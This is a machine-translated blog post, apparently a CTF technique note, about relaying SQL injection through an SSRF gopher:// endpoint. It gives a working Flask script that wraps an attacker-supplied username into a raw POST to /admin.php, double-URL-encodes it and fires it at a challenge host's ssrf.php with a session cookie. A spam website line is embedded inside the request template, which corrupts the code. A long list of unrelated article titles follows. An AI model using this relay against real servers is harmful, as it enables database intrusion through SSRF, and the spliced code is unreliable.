Transfer injection of SQL and python flash

nineteens 2021-04-07 16:10:01
transfer injection sql python flash


We're doing the routine SQL At the time of Injection , There are several situations

1、 Often because of the construction of network request trouble

2、 Write tamper It's too much trouble

At this time, our transfer injection will come , There's a Web Questions need to be constructed frequently gopher To achieve POST perhaps GET request , At this time, if we want to achieve more freedom SQL Inject , You can use

from flask import Flask,request

from urllib.parse import quote

import requests

def urlencode(s):

res=''

for c in s:

fuck=hex(ord(c)).split('0x')[1]

if len(fuck)==1:

fuck='0'+fuck

res+="%"+fuck

return res

fuckhtml='''POST /admin.php HTTP/1.1

Host: 127.0.0.1

Connection: close

Content-Type: application/x-www-form-urlencoded

Content-Length: {length} Beihai house purchase website http://bh.goufang.com/

username={username}&password=129581926211651571912466741651878684928'''.replace("\n","\r\n")

tmpPayload= fuckhtml.split("\r\n")[-1]

tmplength = len(tmpPayload) - len('{username}')

url="http://eci-2zehhuwx9m3o88h32zup.cloudeci1.ichunqiu.com/ssrf.php?way=gopher%3A%2F%2F127.0.0.1:80%2F_"

app = Flask(__name__)

@app.route('/')

def hello_world():

username=request.args.get('username')

shit=fuckhtml.format(username=username,length=str(tmplength+len(username)))

cookies={'PHPSESSID':'qitbcj1puicm4qcpf8oe1fgc17'}

page=requests.get(url+urlencode(urlencode(shit)),proxies={'http':'http://127.0.0.1:8081'},cookies=cookies).text

return page

if __name__ == '__main__':

app.run()

Of course we can get rid of proxies Parameters , It's added here for the sake of peace burpsuite Achieve linkage

版权声明
本文为[nineteens]所创,转载请带上原文链接,感谢
https://pythonmana.com/2021/04/20210407160251419Z.html

  1. 用 Python 读写 Excel 表格
  2. Python装饰器高级用法
  3. Reading and writing excel table with Python
  4. Python decorator advanced usage
  5. 从零开始学python | 什么是Python JSON?
  6. Learn Python from scratch | what is Python JSON?
  7. Python with关键字原理详解
  8. Python with keyword principle
  9. python + uiautomator2 实现钉钉工单提交
  10. 一个神级般的 Python 调试神器
  11. Nail work order submission based on Python + uiautomator2
  12. A magic Python debugging artifact
  13. 从零开始学python | 什么是Python JSON?
  14. Learn Python from scratch | what is Python JSON?
  15. 上手Pandas,带你玩转数据(3)-- pandas数据存入文件
  16. Start pandas, take you to play with data (3) -- save pandas data into file
  17. Python能代替shell吗?有什么特点?
  18. Can Python replace shell? What are the features?
  19. Scikit-learn 机器学习库介绍!【Python入门】
  20. Scikit learn machine learning library introduction! [introduction to Python]
  21. 【Python从零到壹】面向对象的封装,继承和多态
  22. Scikit-learn 机器学习库介绍!【Python入门】
  23. Python能代替shell吗?有什么特点?
  24. 【Python从零到壹】Python文件的操作详解
  25. 【Python从零到壹】Python爬虫部分开篇
  26. 【Python从零到壹】学习Python爬虫前,你需要先掌握这些内容
  27. 【Python从零到壹】python爬虫系列-网络请求
  28. Object oriented encapsulation, inheritance and polymorphism
  29. Python经典面试题(附答案)!
  30. Scikit learn machine learning library introduction! [introduction to Python]
  31. 菜谱系统小成阶段,Python Web 领域终于攻占一个小山头
  32. Python Web 菜谱项目再次前进一步,从应用层了解内置用户认证系统
  33. Can Python replace shell? What are the features?
  34. Detailed explanation of Python file operation
  35. Python from zero to one
  36. [Python from zero to one] before learning Python crawler, you need to master these contents
  37. [Python from zero to one] Python crawler series - web request
  38. Python经典面试题(附答案)!
  39. Python classic interview questions (with answers)!
  40. When the recipe system was in its infancy, python web finally took over a small hill
  41. Python web menu project takes another step forward to learn about the built-in user authentication system from the application layer
  42. Python classic interview questions (with answers)!
  43. 【Python从零到壹】Python的循环结构详解
  44. 【Python从零到壹】Python列表详解
  45. 【Python从零到壹】Python的字典详解
  46. 【Python从零到壹】Python的字符串详解
  47. 【Python从零到壹】Python基础之函数的应用
  48. 【Python从零到壹】用Python实现植物大战僵尸里的面向对象
  49. Detailed explanation of Python loop structure
  50. Detailed explanation of Python list
  51. Detailed explanation of Python dictionary
  52. Detailed explanation of Python string
  53. [Python from zero to one] the application of Python basic functions
  54. [Python from zero to one] using Python to realize object-oriented in plant vs. zombie
  55. 用 Python 实现微信版飞机大战
  56. 用 Python 实现***帝国中的数字雨落既视感
  57. 想知道未来孩子长相?Python人脸融合告诉你
  58. 我用 Python 做了一个全球疫情数据大屏
  59. Using Python to realize wechat aircraft war
  60. Using Python to realize the visual sense of digital rain in the Empire of the Communist Party of China